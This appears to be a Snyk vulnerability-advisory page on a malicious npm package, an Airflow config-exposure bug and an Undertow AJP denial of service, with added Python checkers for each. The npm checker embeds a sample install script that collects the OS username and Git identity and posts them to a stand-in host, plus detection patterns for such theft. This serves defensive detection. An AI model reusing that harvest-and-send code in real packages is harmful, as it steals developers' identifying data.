We’ve disclosed 3381 vulnerabilities, by Snyk Security Researchers
How to fix?
Do not use any malicious version of the tukaani-project/xz package; pin to a version that is not affected.
@gusmano/reext is a malicious package. It contains code that steals sensitive information, including the operating system username and the Git username and email configured on the host.
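As an added illustration (not code from this page or from Snyk), the following Python heuristic audits an npm package for the behaviour described above: an install-time lifecycle script combined with reads of the OS username or Git identity and an outbound network call. The package manifest and setup.js embedded below are constructed for the example and are not the contents of @gusmano/reext; the regexes are assumptions about how such code usually looks, not a signature for this package.

```python
import json
import re

# Constructed package contents for the example (assumptions, NOT the real
# contents of @gusmano/reext). They use the common ways an npm package can
# read the OS username and Git identity and ship them off-host.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "hypothetical-pkg",
    "version": "1.0.0",
    "scripts": {"postinstall": "node setup.js"},
})

SAMPLE_SOURCES = {
    "setup.js": r"""
const os = require('os');
const { execSync } = require('child_process');
const https = require('https');
const info = {
  user: os.userInfo().username,
  gitName: execSync('git config user.name').toString().trim(),
  gitEmail: execSync('git config user.email').toString().trim(),
};
const req = https.request({ hostname: 'example.invalid', method: 'POST', path: '/' });
req.end(JSON.stringify(info));
""",
}

# Scripts npm runs automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, regex) pairs. Each regex is a heuristic, not proof of malice.
PATTERNS = [
    ("reads OS username", re.compile(r"os\.userInfo\s*\(|process\.env\.(USER|USERNAME)")),
    ("reads Git identity", re.compile(r"git\s+config\s+(--global\s+)?user\.(name|email)")),
    ("sends data over the network", re.compile(r"https?\.request\s*\(|fetch\s*\(|\.post\s*\(")),
    ("runs shell commands", re.compile(r"child_process|execSync\s*\(|spawn\s*\(")),
]


def audit_npm_package(package_json_text, sources):
    """Return (file, label) findings for a package manifest and its source files.

    The manifest is flagged when it declares lifecycle scripts, which run on
    `npm install` without any user action and are the usual foothold for
    info-stealing packages.
    """
    findings = []
    manifest = json.loads(package_json_text)
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(("package.json", f"lifecycle script '{hook}': {cmd}"))
    for path, text in sources.items():
        for label, rx in PATTERNS:
            if rx.search(text):
                findings.append((path, label))
    return findings


def verdict(findings):
    """'suspicious' when an install hook, identity collection and network egress
    appear together; that combination is the behaviour described for this
    class of package. Anything weaker is left for manual review."""
    labels = {label for _, label in findings}
    has_hook = any(label.startswith("lifecycle script") for label in labels)
    harvests = "reads OS username" in labels or "reads Git identity" in labels
    exfil = "sends data over the network" in labels
    return "suspicious" if has_hook and harvests and exfil else "review"


if __name__ == "__main__":
    found = audit_npm_package(SAMPLE_PACKAGE_JSON, SAMPLE_SOURCES)
    for path, label in found:
        print(f"{path}: {label}")
    print("verdict:", verdict(found))
```

To apply this to a real package, fetch it with `npm pack <name>` and feed the extracted package.json and .js files to audit_npm_package. Any one pattern alone is common in legitimate tooling; the decisive signal is identity collection plus egress inside a script that runs at install time, which is why verdict only escalates on the combination.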
apache-airflow is a platform to programmatically author, schedule, and monitor workflows.
Affected versions of this package are vulnerable to Information Exposure via the configuration UI page. When webserver.expose_config is set to non-sensitive-only, sensitive provider configuration values are still rendered on that page, so any user who can view it can read them. This happens even though the celery provider is currently the only community provider that has sensitive configuration.
Note: This is only exploitable if the webserver.expose_config setting is non-sensitive-only.
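An added example (not code from this page or from the Airflow project) that checks an airflow.cfg for the setting that triggers this exposure and shows the corrected value beside it. The configuration fragments are constructed; the AIRFLOW__WEBSERVER__EXPOSE_CONFIG environment override is Airflow's standard way of overriding a file setting, and the set of strings treated as boolean true is an assumption kept deliberately narrow.

```python
import configparser

# Constructed airflow.cfg fragments (assumptions, not from a real deployment).
WEAK_CFG = """
[webserver]
expose_config = non-sensitive-only
"""

FIXED_CFG = """
[webserver]
expose_config = False
"""

# Airflow lets AIRFLOW__<SECTION>__<KEY> in the environment override the file.
ENV_OVERRIDE = "AIRFLOW__WEBSERVER__EXPOSE_CONFIG"

# Assumption: strings Airflow accepts as boolean true for this option.
TRUE_VALUES = {"true", "t", "1"}


def effective_expose_config(cfg_text, env=None):
    """Return the effective [webserver] expose_config value, lower-cased.

    An audit that reads only airflow.cfg misses an environment override, so
    the override is checked first, exactly as Airflow resolves it.
    """
    env = env or {}
    if ENV_OVERRIDE in env:
        return env[ENV_OVERRIDE].strip().lower()
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(cfg_text)
    # Airflow's default for expose_config is False.
    return parser.get("webserver", "expose_config", fallback="False").strip().lower()


def check_expose_config(cfg_text, env=None):
    """Classify the setting.

    'fail': the vulnerable non-sensitive-only mode described in the advisory.
    'warn': True, which exposes the whole configuration, secrets included, by design.
    'pass': anything else (the default False hides the page entirely).
    """
    value = effective_expose_config(cfg_text, env)
    if value == "non-sensitive-only":
        return ("fail", "expose_config=non-sensitive-only still shows sensitive provider config; set it to False")
    if value in TRUE_VALUES:
        return ("warn", "expose_config=True exposes the full configuration, secrets included, to UI users")
    return ("pass", f"expose_config={value}")


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CFG), ("fixed", FIXED_CFG)):
        print(label, check_expose_config(cfg))
    # The file says False, but the environment silently re-enables the weak mode.
    print("env override", check_expose_config(FIXED_CFG, env={ENV_OVERRIDE: "non-sensitive-only"}))
```

Run the check with `env=dict(os.environ)` on the webserver host; a clean airflow.cfg is not a clean deployment if the container or systemd unit sets the override.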
io.undertow:undertow-core is a Java web server based on non-blocking IO.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests whose headers exceed the max-header-size attribute configured on the ajp-listener; the server then closes the TCP connection without returning an AJP response.
Note: This is only exploitable if max-header-size is set to 64 KB or less.
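An added example (not code from this page or from the Undertow project) that scans a WildFly-style Undertow subsystem configuration and flags every ajp-listener whose max-header-size meets the 64 KB-or-less precondition stated in the note. The XML fragment, listener names and namespace version are constructed; the 1 MB value used when the attribute is absent is an assumption about Undertow's default, so confirm it against the version you run.

```python
import xml.etree.ElementTree as ET

THRESHOLD = 64 * 1024  # 64 KB: the advisory's exploitability bound (inclusive)
# Assumption: Undertow's default header limit when max-header-size is not set.
DEFAULT_MAX_HEADER_SIZE = 1024 * 1024

# Constructed WildFly-style Undertow subsystem fragment; listener names and the
# namespace version are made up for the example.
SAMPLE_XML = """
<subsystem xmlns="urn:jboss:domain:undertow:12.0">
  <server name="default-server">
    <ajp-listener name="ajp" socket-binding="ajp" max-header-size="65536"/>
    <ajp-listener name="ajp-internal" socket-binding="ajp-internal" max-header-size="1048576"/>
    <ajp-listener name="ajp-default" socket-binding="ajp-default"/>
    <http-listener name="default" socket-binding="http" max-header-size="8192"/>
  </server>
</subsystem>
"""


def local_name(tag):
    """Strip the XML namespace so matching works for any subsystem schema version."""
    return tag.rsplit("}", 1)[-1]


def ajp_listener_header_limits(xml_text):
    """Return (listener name, effective max-header-size in bytes) for each ajp-listener.

    http-listener elements are ignored: the advisory concerns the AJP path only.
    """
    root = ET.fromstring(xml_text.strip())
    limits = []
    for el in root.iter():
        if local_name(el.tag) != "ajp-listener":
            continue
        raw = el.get("max-header-size")
        size = int(raw) if raw is not None else DEFAULT_MAX_HEADER_SIZE
        limits.append((el.get("name"), size))
    return limits


def check_ajp_listeners(xml_text):
    """Tag each listener 'at-risk' when its limit is 64 KB or less, 'ok' otherwise."""
    return [
        (name, size, "at-risk" if size <= THRESHOLD else "ok")
        for name, size in ajp_listener_header_limits(xml_text)
    ]


if __name__ == "__main__":
    for name, size, status in check_ajp_listeners(SAMPLE_XML):
        print(f"{name}: max-header-size={size} -> {status}")
```

An 'at-risk' listener on an affected undertow-core version meets the precondition; the fix is to move to a version that is not affected, and the check is meant to prioritise which hosts need that first. Raising max-header-size above 64 KB changes the precondition but also raises the memory an attacker can tie up per connection, so treat it as a stopgap rather than a remediation.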
Arbitrary Code Injection in mysql2 (npm)
Prototype Pollution in lodash (npm)
Prototype Pollution in lodash.zipobjectdeep (npm)
Remote Code Execution (RCE) in mysql2 (npm)
Prototype Poisoning in mysql2 (npm)
Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer's toolkit.